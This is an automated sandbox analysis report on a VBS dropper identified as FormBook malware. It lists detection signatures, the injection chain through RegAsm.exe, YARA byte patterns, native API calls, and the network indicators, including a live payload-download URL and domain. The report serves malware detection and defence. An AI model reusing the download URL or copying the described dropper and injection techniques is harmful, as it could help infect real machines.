Edit tour

Windows Analysis Report
KjFT0qPTo4.vbs

Overview

General Information

Sample name:	KjFT0qPTo4.vbs renamed because original name is a hash value
Original sample name:	437d16ac6fb62c138841e2ddb216dca0.vbs
Analysis ID:	1530695
MD5:	437d16ac6fb62c138841e2ddb216dca0
SHA1:	0c74d149fbd1f4f1a20ba1f962564d02a88d184f
SHA256:	2b18564d817f6070f7cdb7f29dc8ba06a96772c7ce0ea72e74c944b089bf7df4
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Yara detected FormBook

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Installs new ROOT certificates

Machine Learning detection for dropped file

Potential malicious VBS script found (has network functionality)

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores large binary data to the registry

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w7x64

wscript.exe (PID: 3232 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\KjFT0qPTo4.vbs" MD5: 045451FA238A75305CC26AC982472367)

temp_executable.exe (PID: 3316 cmdline: "C:\Users\user\AppData\Local\Temp\temp_executable.exe" MD5: 12E3B467C52A663A7B6F61AF61B63A11)

RegAsm.exe (PID: 3396 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.455484382.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.455484382.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f293:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17342:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.455450302.0000000000270000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.455450302.0000000000270000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2c1b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1425f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.RegAsm.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.RegAsm.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e493:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16542:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
3.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.RegAsm.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f293:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17342:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\KjFT0qPTo4.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\KjFT0qPTo4.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\KjFT0qPTo4.vbs", ProcessId: 3232, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\KjFT0qPTo4.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\KjFT0qPTo4.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\KjFT0qPTo4.vbs", ProcessId: 3232, ProcessName: wscript.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Avira: detection malicious, Label: TR/Dropper.Gen

Multi AV Scanner detection for domain / URL

Source: transfer.adttemp.com.br	Virustotal: Detection: 5%			Perma Link
Source: http://transfer.adttemp.com.br	Virustotal: Detection: 5%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.455484382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.455450302.0000000000270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Joe Sandbox ML: detected

Source: unknown

HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.22:49163 version: TLS 1.2

Source:	Binary string: VCBJER234.pdb source: wscript.exe, 00000000.00000003.371603253.0000000003ED3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.371785671.000000000476B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.371651218.0000000003BCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.371908468.0000000004410000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000002.00000000.364263905.00000000012F2000.00000020.00000001.01000000.00000006.sdmp, temp_executable.exe.0.dr
Source:	Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Networking

Potential malicious VBS script found (has network functionality)

Source:

Initial file: stream.SaveToFile filePath, 2 ' Overwrite existing file

Source: global traffic

HTTP traffic detected: GET /hUkry/sirdeeeeee.txt HTTP/1.1Host: transfer.adttemp.com.brConnection: Keep-Alive

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: global traffic

HTTP traffic detected: GET /hUkry/sirdeeeeee.txt HTTP/1.1Host: transfer.adttemp.com.brConnection: Keep-Alive

Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic

DNS traffic detected: DNS query: transfer.adttemp.com.br

Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: temp_executable.exe, 00000002.00000002.371150308.0000000002777000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: temp_executable.exe, 00000002.00000002.371150308.0000000002794000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://transfer.adttemp.com.br
Source: temp_executable.exe, 00000002.00000002.371150308.0000000002794000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://transfer.adttemp.com.brX
Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: temp_executable.exe, 00000002.00000002.371005073.0000000000550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: temp_executable.exe, 00000002.00000002.371150308.0000000002777000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://transfer.adttemp.com.br
Source: temp_executable.exe, 00000002.00000002.371150308.0000000002777000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://transfer.adttemp.com.br/hUkry/sirdeeeeee.txt
Source: temp_executable.exe, 00000002.00000002.371150308.0000000002777000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://transfer.adttemp.com.br/hUkry/sirdeeeeee.txtX~

Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163

Source: unknown

HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.22:49163 version: TLS 1.2

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.455484382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.455450302.0000000000270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.455484382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.455450302.0000000000270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\ProgID			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory allocated: 770B0000 page execute and read and write			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 770B0000 page execute and read and write			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042C563 NtClose,	3_2_0042C563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022F07AC NtCreateMutant,LdrInitializeThunk,	3_2_022F07AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022EFAE8 NtQueryInformationProcess,LdrInitializeThunk,	3_2_022EFAE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022EFB68 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_022EFB68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022EF9F0 NtClose,LdrInitializeThunk,	3_2_022EF9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022EFDC0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_022EFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022F0060 NtQuerySection,	3_2_022F0060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022F0078 NtResumeThread,	3_2_022F0078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022F0048 NtProtectVirtualMemory,	3_2_022F0048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022F00C4 NtCreateFile,	3_2_022F00C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022F10D0 NtOpenProcessToken,	3_2_022F10D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022F010C NtOpenDirectoryObject,	3_2_022F010C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022F1148 NtOpenThread,	3_2_022F1148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022F01D4 NtSetValueKey,	3_2_022F01D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022EFA20 NtQueryInformationFile,	3_2_022EFA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022EFA50 NtEnumerateValueKey,	3_2_022EFA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022EFAB8 NtQueryValueKey,	3_2_022EFAB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022EFAD0 NtAllocateVirtualMemory,	3_2_022EFAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022EFB50 NtCreateKey,	3_2_022EFB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022EFBB8 NtQueryInformationToken,	3_2_022EFBB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022EFBE8 NtQueryVirtualMemory,	3_2_022EFBE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022EF8CC NtWaitForSingleObject,	3_2_022EF8CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022EF938 NtWriteFile,	3_2_022EF938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022F1930 NtSetContextThread,	3_2_022F1930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022EF900 NtReadFile,	3_2_022EF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022EFE24 NtWriteVirtualMemory,	3_2_022EFE24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022EFEA0 NtReadVirtualMemory,	3_2_022EFEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022EFED0 NtAdjustPrivilegesToken,	3_2_022EFED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022EFF34 NtQueueApcThread,	3_2_022EFF34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022EFFB4 NtCreateSection,	3_2_022EFFB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022EFFFC NtCreateProcessEx,	3_2_022EFFFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022EFC30 NtOpenProcess,	3_2_022EFC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022EFC60 NtMapViewOfSection,	3_2_022EFC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022EFC48 NtSetInformationFile,	3_2_022EFC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022F0C40 NtGetContextThread,	3_2_022F0C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022EFC90 NtUnmapViewOfSection,	3_2_022EFC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022EFD5C NtEnumerateKey,	3_2_022EFD5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022EFD8C NtDelayExecution,	3_2_022EFD8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022F1D80 NtSuspendThread,	3_2_022F1D80

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_002C9970	2_2_002C9970
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_002C8148	2_2_002C8148
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_002C1A60	2_2_002C1A60
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_002C16D0	2_2_002C16D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00402350	3_2_00402350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042EB83	3_2_0042EB83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040FCFB	3_2_0040FCFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00404486	3_2_00404486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040FD03	3_2_0040FD03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00402E60	3_2_00402E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004166B3	3_2_004166B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040FF23	3_2_0040FF23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040DFA3	3_2_0040DFA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_023A1238	3_2_023A1238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022FE2E9	3_2_022FE2E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02302305	3_2_02302305
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0234A37B	3_2_0234A37B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02307353	3_2_02307353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_023A63BF	3_2_023A63BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022FF3CF	3_2_022FF3CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_023263DB	3_2_023263DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0232D005	3_2_0232D005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0231905A	3_2_0231905A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02303040	3_2_02303040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022FE0C6	3_2_022FE0C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0234A634	3_2_0234A634
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_023A2622	3_2_023A2622
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02304680	3_2_02304680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0230E6C1	3_2_0230E6C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0230C7BC	3_2_0230C7BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0238579A	3_2_0238579A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_023357C3	3_2_023357C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0233D47D	3_2_0233D47D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02335485	3_2_02335485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02311489	3_2_02311489
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0230351F	3_2_0230351F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02346540	3_2_02346540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0231C5F0	3_2_0231C5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_023B3A83	3_2_023B3A83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02327B00	3_2_02327B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_023ACBA4	3_2_023ACBA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0238DBDA	3_2_0238DBDA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_022FFBD7	3_2_022FFBD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0232286D	3_2_0232286D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0230C85C	3_2_0230C85C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0239F8EE	3_2_0239F8EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02385955	3_2_02385955
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_023029B2	3_2_023029B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_023A098E	3_2_023A098E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_023169FE	3_2_023169FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02332E2F	3_2_02332E2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0231EE4C	3_2_0231EE4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02310F3F	3_2_02310F3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0232DF7C	3_2_0232DF7C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02330D3B	3_2_02330D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0230CD5B	3_2_0230CD5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0239FDDD	3_2_0239FDDD

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 02343F92 appears 108 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0234373B appears 238 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 022FE2A8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0236F970 appears 81 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 022FDF5C appears 118 times

Source: KjFT0qPTo4.vbs

Initial sample: Strings found which are bigger than 50

Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
